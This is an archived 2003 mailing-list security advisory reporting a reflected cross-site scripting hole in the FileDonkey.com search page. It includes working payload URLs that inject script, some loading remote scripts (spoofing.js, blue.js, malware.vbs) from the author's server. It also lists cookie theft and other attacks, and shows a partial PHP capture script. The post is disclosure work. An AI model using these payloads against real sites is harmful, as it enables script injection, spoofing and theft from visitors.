lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 12 Oct 2003 18:49:59 +0200
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@...g-security.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>, <webmaster@...edonkey.com>
Subject: FileDonkey.com Cross Site Scripting


FileDonkey.com Cross Site Scripting
------

WEBSITE: File Donkey
DOMAIN: www.filedonkey.com
RISK: 7
OWNERS STATUS: webmaster@...edonkey.com [ warned same time as security
lists ]
---------------------
--- DESCRIPTION ---

FileDonkey.com is the only one web search supported engine by P2P clients
like eMule , xMule , etc.
FileDonkey is a world wide used website for found the files that you want in
the eDonkey networks (P2P).

---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------

I was making some tests in the FileDonkey website but i didn't remember the
search engine,
search engines are the first systems affected by Cross Site Scripting holes
because , normally ,
they have an insufficient input validation control and they make outputs (
search results )
without checking for dangerous codes , this can be exploited easily with
some lines of PHP
Code and a little knowledge of PHP and Java Script.

---------------------------------------------
|     CROSS SITE SCRIPTING HOLES FOUND      |
---------------------------------------------

Located in the Search engine , currently using a script with HTML extension
,
search.html .
This script basically uses 5 variables:

pattern=[KEYWORDS]
min_size=[FILE MIN SIZE]
max_size=[FILE MAX SIZE]
scope=[FILE TYPE]
submit=[YOUR SUBMIT BUTTON CODE]

But only one is needed : pattern=

You must include the keywords for the anted file , and , walla ! f the file
is available , it provides you
a nice list of results ( ed2k links ).

The keywords sent will be sown in ( if there are no available files ) :

No files found for pattern 'NoSecureRootGroupSecurityResearch'.

Ok , it seems not vulnerable but , wait a moment , the keywords are in the
form field , and , we know
that a form field always ends with a "> , let's try!

.....We send the request in POST Mode...Or use this url:

http://www.filedonkey.com/search.html?pattern="><script>alert('xD .- Shields
Down ! -. xD');</script>

And we get...

         -----JavaScript Application-----
         |                              |
         |  xD .- Shields Down ! -. xD  |
         |                              |
         |------------------------------|

The script was successfully executed in the client side .
Fantastic for attackers ( not me ;-).
We can try more things  , and , of course , my loved PHP perfomance:

.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
| CODE FOR THE COMMON XSS TESTING TASKS |
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

/\ cut from here /\


<?php
// ----------------------------------
// XSS TESTING SCRIPT
// NO SECURE ROOT GROUP SECURITY RESEARCH
// BY LORENZO HERNANDEZ GARCIA-HIERRO
// * NOT FULL VERSION *
// ----------------------------------
$domain = "FileDonkey.com/Other";
$member = "Lorenzo Hernandez Garcia-Hierro";
$referer = getenv("HTTP_REFERER");
$data = getenv("QUERY_STRING");
$xss = strip_tags($data);
echo "$xss";
?>

/\ xss-testing.php END ! /\

Please note that i removed lots of lines of the code for prevent bad uses of
this.

A full version is running under
http://test-zone.nsrg-security.com/xss/?XSS_TEST
it has


-- THE REAL EXPLOITATION --

Now we start to exploit the xss hole :


*-.Possible attacks:

1.- Including malicious scripts for execute them in the Client side.
2.- Try to stole cookies data ( no cookies are given in FileDonkey )
3.- Try to connect to malicious sites trough the Microsoft.XMLHTTP .
4.- Try to use known vulnerabilities for stole other domains data.

SOME PROOFS OF CONCEPTS:
________________________

A script that i developed for change some web page stuff ( spoofing ) :

http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/spoofing.js></script>

A Georgi Guninski Script ( shows a blue screen that spoofs all the screen:

http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/blue.js></script>

Replace Windows Media Player executable with a non dangerous file that sows
a dialog with some nice stuff of the NSRGroup:

http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/malware.vbs></script>

The XSS standard testing script ( NSRGroup XSS-TST-STANDARD )

http://test-zone.nsrg-security.com/xss/?XSS-TST-STANDARD


*//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
* REFERENCES -> ONLINE
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

http://advisories.nsrg-security.com/FileDonkey.com-XSS

-----------
| CONTACT |
-----------

-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->Security Consultant
__________________________________
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists